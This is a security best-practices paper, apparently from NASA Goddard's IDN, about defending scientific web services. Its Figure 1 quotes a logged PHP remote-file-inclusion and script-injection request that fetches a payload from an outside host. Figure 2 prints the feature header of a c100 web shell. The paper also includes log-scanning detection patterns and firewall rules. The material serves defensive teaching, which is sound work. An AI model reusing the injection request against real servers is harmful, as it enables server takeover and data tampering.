Security: Best Practice Insights from the IDN

Background

The Goddard Space Flight Center was an early adopter of Internet-based networking. Networks were initially set up in an open environment, with few restrictions or security measures in place. As time progressed and network-based attacks increased, additional security measures were put into place. During the 1970s and 1980s, there was a “default allow” policy, with only key ports (telnet, for example) being blocked or limited. Attackers were easily able to target systems and services on higher ports that were not restricted. During the late 1990s, a “default deny” policy was implemented, which greatly reduced the attack surface to key public services such as FTP, HTTP, and email. The result was a large increase in the number of attacks on those ports.

Within the IDN, we have seen two major trends: 1) an increase in the number of web services we offer, and 2) an increase in the number of web attacks that are occurring. The IDN may serve as an example for the greater WGISS community as a whole. The WGISS community faces a similar dilemma: we have a responsibility to serve our users and to collaborate within the community, and the Web is currently the best mechanism to do this. In doing so, however, our overall security posture may be weakened. To combat this, we must, as a group, communicate the threats and solutions in our community, implement proactive security awareness, and incorporate security best practices.

Importance

The scientific community depends completely on the quality and accuracy of the data it uses. With the proliferation and interdependence of web services, the assurance that those services are accurate and secure becomes increasingly critical. The introduction of a single security flaw into a web-services-based architecture could have a widespread, international impact. This is especially true of web service chaining architectures.
General system security, especially in light of recent high-profile email account hacks, is also of great importance.

Evidence

Within the IDN, malicious attacks and probes are a common occurrence. Some probes are “shots in the dark”, with attackers casting a wide net, looking for common mistakes that are easily compromised. Other attacks appear more reconnaissance-based, probing systems for open ports and possible entry points. In the following real-world example (fig. 1), some of the attacks carry a devastating payload:

Seen in server logs:

83.217.66.xxx - - [03/Sep/xxxx:05:56:51 -0400] "GET http://xxx.gsfc.nasa.gov/some.cgi?rcpt=http://ydfgsdfg.txt?=<script>alert("xxx");</script> Hello Admin! Today%20You're Being Hacked By Sys!<script>alert("Hacked By Sys");</script><?php include ("http://xyz.altervista.org/private2.txt?"); ?><a href="<?php require ($files_dir.'/_custom_menu_link.php'); ?>"><?php require($files_dir.'/_custom_menu_name.php'); ?></<br><a href="<?php require($files_dir.'/_custom_menu_name.php'); ?>prova</a><b>es_custom_menu.php?files_dir=http://xyz.altervista.org/private2.txt?<a href="<?php require($files_dir.'http://paintweb.altervista.org/private2.txt?); ?>prova1</a><br><a href="<?php require($files_dir.'http://paintweb.altervista.org/private2.txt?); ?">hacked</a><br><a href=<?php require($files_dir.'http://xyz.web.altervista.org/private2.txt?); ?>ha2cked</a><br>< href=page?= >ha2c3ked</a><br><a href=asd?page= >ha2c3keed</a><br>asd?page=http://xxx.altervista.org/private2.txt? HTTP/1.1" 200 31477 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" TCP_MISS:DIRECT

Figure 1: Web Based Attack Detected

This attack attempts to take advantage of an improperly configured web server running the PHP web programming language. In just one request, it attempts to cause the vulnerable web server to download and execute a well-crafted payload (fig. 2) with devastating capabilities:

Payload at http://xyz.altervista.org/private2.txt:

<?php
/***********************************************************************
 * Locus7s Modified c100 Shell
 * Beta v. 1.0a - Project x2300
 * Written by #ophAcker team
 * Modified by error & Be_gO
 * Re-Modified by #error_maker (15.2.07)
 *========================================================
 * New Modifications Implemented -*
 * -Added link to Enumerate to escalate priviledges
 * -Added Rootshell.c
 * -Added Rootshell.c;auto-compiler
 * -Execute Rootshell.c
 * -Added Mig-Log Logcleaner
 * -Execute Mig-Log Logcleaner
 * -milw0rm searcher (Grabs OS and searches milw0rm)
 * -Locus7s Style & Image
 * -Added w4ck1ng Shell Backdoor Connect and Backdoor
 * -Added PHP-Proxy link to hide you
 * -Added your ip and server ip with whois capability
 * -Added private 0day released by allahaka which utilizes the linux
 *  sudo bash to execute a stack overflow.
(Continued)

Figure 2: Attack Payload

As can be seen in this example, the payload includes root shell compromises, log cleaners, PHP proxies to create back-door access to the server, stack overflows, and privilege escalation, amongst others. Any one of these capabilities could yield full control of the system to the attacker, potentially without the owners of the system ever detecting the compromise. Within the WGISS community, it should be clear how such a compromise could lead to serious ramifications in the scientific world. Web server compromises could lead, directly or indirectly, to the compromise of data repositories and metadata systems. Should the integrity of those systems come into question, so too could the science derived from that data. The above example is just one of the many types of attacks that we face today.

Solutions/Best Practices

Obtaining a high level of security while maintaining robust levels of usability and interoperability is a time-consuming, perpetually changing, and dynamic process.
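Attacks like the one in Figure 1 leave recognizable traces in server logs, and proactive log review is one of the cheapest defenses available. The following Python sketch is illustrative only: the indicator patterns and sample log lines below are assumptions for demonstration, not a complete detection list.

```python
# Illustrative log triage: flag access-log lines containing common
# injection indicators. Patterns are examples, not an exhaustive set.
import re

SUSPICIOUS = [
    r"<script",        # cross-site scripting attempts
    r"<\?php",         # PHP code injection
    r"=https?://",     # remote file inclusion via URL parameters
    r"\.\./\.\./",     # directory traversal
]
PATTERN = re.compile("|".join(SUSPICIOUS), re.IGNORECASE)

def flag_suspicious(log_lines):
    """Yield log lines matching any injection indicator."""
    for line in log_lines:
        if PATTERN.search(line):
            yield line

# Hypothetical sample lines in combined-log style:
sample = [
    '10.0.0.1 - - [03/Sep:05:56:51] "GET /index.html HTTP/1.1" 200 512',
    '83.217.66.1 - - [03/Sep:05:56:52] "GET /some.cgi?rcpt=<script>alert(1)</script> HTTP/1.1" 200 31477',
]
for hit in flag_suspicious(sample):
    print(hit)  # prints only the second, script-injecting line
```

In practice, triage like this would feed a proper log-analysis or intrusion-detection pipeline rather than replace one.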
As systems and software change and new capabilities are added, new attack vectors arise. Some applications that serve our community are provided by Commercial Off the Shelf (COTS) vendors or Open Source Software (OSS) providers. For example, the Catalog Service for the Web (CSW) protocols are commonly implemented using COTS or OSS software. When choosing COTS or OSS software, there are several best practices that can be followed. Investigating the security record of the software provider can be useful, as can inspecting the frequency of software releases and maintenance. Staying on top of software security patches is vital, and regular maintenance checks should be performed. Review your COTS/OSS software logs; often, failed attack attempts will be seen in the logs prior to a compromise. Additionally, software should be remotely and locally audited for security vulnerabilities, both with automated security applications and by knowledgeable software developers and security professionals.

In all cases, the Principle of Least Privilege should be applied. This applies to the software modules that are deployed and, where limiting modules is not practical, to restricting access to the application to only those who require it. Consider whether the application needs to be open to the entire world or whether access restrictions should be implemented. There are a variety of mechanisms that can be used to limit access to your server: authentication can be applied, specific Allow/Deny directives can be incorporated into the web server, firewall rules can be established to allow only specific users from specific hosts, and rate limiting can be incorporated to limit the ability of an attacker to execute brute force attempts against your web server. Figure 3 shows an example of how to limit access attempts on a Linux server using the host-based Linux firewall. In this example, access is limited to 100 requests in a 60-second period.
-A WEB -m recent --set --name WEB
-A WEB -m recent --update --seconds 60 --hitcount 100 --rttl --name WEB -j DROP
-A WEB -j ACCEPT

Figure 3: Rate Limiting with Linux IPTables

Regular security audits should be performed as a part of general system security. There are a variety of tools that can be used to look for problems with a server. Nmap can be used for network and web service audits; it provides operating system detection capabilities and web service version detection. Nessus can be used for full security scans; it scans for all network vulnerabilities, and commercial support is available. Nikto is another tool that is good at looking for specific web vulnerabilities; it can detect over 3500 dangerous files or CGIs and is capable of flagging over 250 web server vulnerabilities.

In addition to scanning the software for problems, it is critical to understand the inner workings of the software and the capabilities it provides. For example, the OpenGIS Catalogue Services Specification defines how a request can be used to delete elements from a repository (fig. 4):

OpenGIS® Catalogue Services Specification, Page 168

10.11.3.4 Delete action

The following XML Schema fragment defines a delete action:

<xsd:complexType name="DeleteType" id="DeleteType">
  <xsd:sequence>
    <xsd:element ref="csw:Constraint" minOccurs="1" maxOccurs="1"/>
  </xsd:sequence>
  <xsd:attribute name="typeName" type="xsd:anyURI" use="optional"/>
  <xsd:attribute name="handle" type="xsd:ID" use="optional"/>
</xsd:complexType>

The <Delete> element contains a <csw:Constraint> element (see Subclause 10.3.7) that identifies a set of records that are to be deleted from the catalogue. The <csw:Constraint> element shall be specified in order to prevent every record in the catalogue from inadvertently being deleted. The typeName attribute is used to specify the collection name from which records will be deleted. The handle attribute is described in subclause 10.11.3.2.
Figure 4: OpenGIS Catalogue Services Specification

Some users of the COTS/OSS software that implements the specification may not be aware of the full capabilities of the software. Should this function be improperly deployed, it may be possible for external individuals to delete every record in the database. Fully understanding the software is paramount prior to deployment.

Other security best practices include:
1. security in depth, using multiple mechanisms for limiting access or authenticating,
2. understanding trust relationships with other projects and other agencies,
3. focusing on data integrity,
4. running good, reliable, and tested backups,
5. preventing data misuse or misattribution, and
6. employing a knowledgeable, dependable staff.

As always, common sense is often the best practice. While security may seem like an unnecessary burden, one must always measure the consequences. In the case of scientific data and metadata integrity, those consequences may be far more extensive than they appear on the surface.
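To make the CSW Delete risk concrete, the sketch below shows one way to apply the Principle of Least Privilege to that capability. It is a hypothetical Python filter, not part of any particular CSW implementation; the CSW 2.0.2 namespace and the caller-authorization flag are assumptions about the deployment.

```python
# Illustrative only: reject CSW Transaction requests containing a
# <csw:Delete> action unless the caller is explicitly authorized.
# The namespace below assumes CSW 2.0.2; adjust for your deployment.
import xml.etree.ElementTree as ET

CSW_NS = "http://www.opengis.net/cat/csw/2.0.2"

def transaction_allowed(xml_body: str, caller_authorized: bool) -> bool:
    """Return False if the request carries a Delete action and the
    caller is not on the (hypothetical) authorized list."""
    try:
        root = ET.fromstring(xml_body)
    except ET.ParseError:
        return False  # malformed requests are rejected outright
    has_delete = root.find(f".//{{{CSW_NS}}}Delete") is not None
    return caller_authorized or not has_delete

# A minimal Transaction request containing a Delete action:
request = (
    f'<csw:Transaction xmlns:csw="{CSW_NS}">'
    f'<csw:Delete typeName="csw:Record">'
    f'<csw:Constraint version="1.1.0"/>'
    f'</csw:Delete></csw:Transaction>'
)
print(transaction_allowed(request, caller_authorized=False))  # False
print(transaction_allowed(request, caller_authorized=True))   # True
```

A real deployment would tie the authorization decision to the server's actual authentication mechanism; the point here is simply that destructive capabilities can be gated rather than exposed by default.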